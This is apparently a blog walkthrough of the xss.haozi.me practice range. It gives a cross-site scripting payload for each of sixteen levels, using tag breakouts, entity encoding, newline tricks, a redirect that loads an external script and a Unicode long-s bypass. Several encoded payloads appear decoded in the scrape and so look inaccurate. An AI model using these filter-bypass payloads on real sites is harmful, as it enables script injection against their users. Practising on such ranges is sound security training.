当前位置:网站首页>XSS range intermediate bypass
XSS range intermediate bypass
2022-08-01 19:32:00 【You're still there when you come back from the army】
XSSRange intermediate bypass resolution
靶场环境—https://xss.haozi.me/
第一关:
divBlocks are ordinary elements,直接写入< script >标签即可.
<script>alert(1)</script>或者<img src=1 onerror=alert(1)>或者<svg/onload=alert(1)>
第二关:
逃脱< textarea>标签,直接闭合.
</textarea><script>alert(1)</script></textarea>
第三关:
escape the double quotes,闭合input.
a"><script>alert(1)</script>
第四关:
Parentheses are already filtered,所以利用mtml实体编码,编译成().
<img src=1 onerror="alert(1)">
第五关:
过滤了括号,反引号,尖括号,还是利用html实体编码.
<img src=1 onerror="alert(1)">
第六关:
Transform into a smiley face,利用注释符,直接闭合.
--!><script>alert(1)</script><!--
第七关:
换行,然后进行过滤
type = "image" src=1 onerror
=alert(1)
第八关:
Backslashes are filtered,尖括号,标签不生效.img标签可以执行,But can't complete tags,htmlwill miss.
<img src ="1" onerror="alert(1)"
第九关:
输出在< style>里面,Only text can appear,不能写js ,闭合< style>也不行.Close with a newline.
</style
><script>alert(1)</script>
第十关:
以https://www.segmentfault.com开头,将script标签闭合.
https://www.segmentfault.com"></script><script>alert(1)//
第十一关:
还是以https://www.segmentfault.com"开头.利用重定向,新建一个txrt文件,写入alert(1).
https://[email protected]/txrt.js
第十二关:
Convert all letters to uppercase.利用实体编码,Convert all letters to 16进制.
<img src=1 onerror=" alert(1)">
第十三关:
Converted to uppercase and filteredscript标签.
<img src=1 onerror=" alert(1)">
第十四关:
Annotated everything,Still using annotations.
alert(1)
-->
第十五关:
利用是“s”可以转化为“ſ”.
<ſcript src = "http://127.0.0.1/txrt.js"</script>或者
<ſvg/onload=alert(1)>
第十六关:
Convert content to entity encoding,But it works.html认识.
aa');alert(1)//
边栏推荐
猜你喜欢
Mobile Zero of Likou Brush Questions
MySQL中超键、主键及候选键的区别是什么
Source code analysis of GZIPOutputStream class
MySQL你到底都加了什么锁?
kubernetes-部署nfs存储类
Creo5.0草绘如何绘制正六边形
From ordinary advanced to excellent test/development programmer, all the way through
【周赛复盘】LeetCode第304场单周赛
在表格数据上,为什么基于树的模型仍然优于深度学习?
在全志V853开发板试编译QT测试
随机推荐
突破边界,华为存储的破壁之旅
MySQL中超键、主键及候选键的区别是什么
MySQL开发技巧——存储过程
Library website construction source code sharing
分享一个适用于MCU项目的代码框架
部署zabbix
AcWing 797. 差分
不要再使用MySQL online DDL了
1个小时!从零制作一个! AI图片识别WEB应用!
Pytorch模型训练实用教程学习笔记:二、模型的构建
Screenshot of Selenium in Remote
Win11如何删除升级包?Win11删除升级包的方法
小白系统初始化配置资源失败怎么办
What are the application advantages of SaaS management system?How to efficiently improve the digital and intelligent development level of food manufacturing industry?
17、负载均衡
数据库系统原理与应用教程(070)—— MySQL 练习题:操作题 101-109(十四):查询条件练习
有点奇怪!访问目的网址,主机能容器却不行
Pytorch模型训练实用教程学习笔记:四、优化器与学习率调整
kubernetes-部署nfs存储类
Hardware Bear Original Collection (Updated 2022/07)